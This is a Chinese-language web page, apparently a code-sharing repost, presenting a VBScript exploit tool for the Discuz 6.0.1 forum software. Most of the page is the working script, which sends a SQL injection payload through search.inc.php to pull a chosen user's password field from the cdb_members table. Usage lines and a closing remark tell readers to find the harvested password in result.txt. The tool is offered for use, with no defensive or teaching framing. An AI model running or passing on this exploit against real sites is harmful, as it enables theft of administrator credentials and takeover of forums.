• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    discuz 任意管理员密码漏洞利用工具 vbs代码
    也利于修改
    以下是search.inc.php 文件漏洞利用代码VBS版
    复制代码 代码如下:

    Dim strUrl,strSite,strPath,strUid
    showB()
    Set Args = Wscript.Arguments
    If Args.Count > 3 Then
    ShowU()
    Else
    strSite=Args(0)
    strPath=Args(1)
    strUid=Args(2)
    End If
    strUrl="action=searchsearchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" strUid "/*do=submit"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.Open "POST",strSite strPath "index.php", False
    objXML.SetRequestHeader "Accept", "*/*"
    objXML.SetRequestHeader "Accept-Language", "zh-cn"
    objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    objXML.SetRequestHeader "User-Agent", "wap"
    objXML.send(strUrl)
    wscript.echo(objXML.ResponseText)
    Sub showB()
    With Wscript
    .Echo("+--------------------------=====================------------------------------+")
    .Echo("Exploit discuz6.0.1")
    .Echo("Code By Safe3")
    .Echo("+--------------------------=====================------------------------------+")
    End with
    End Sub
    Sub showU()
    With Wscript
    .Echo("+--------------------------=====================------------------------------+")
    .Echo("用法:")
    .Echo(" cscript ".ScriptName" site path uid")
    .Echo("例子:")
    .Echo(" cscript ".ScriptName" http://www.example.com/ /forum/ 1 >result.txt")
    .Echo("+--------------------------=====================------------------------------+")
    .Quit
    End with
    End Sub

    获得的密码大家自己在result.txt中查找
    上一篇:雷客图 站长安全助手 vbs版代码(asp 木马查找)
    下一篇:添加网站到安全站点.设置安全站点打开ActiveX时提示.去页眉页脚的vbs代码
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    discuz 任意管理员密码漏洞利用工具 vbs代码 discuz,任意,管理员,密码,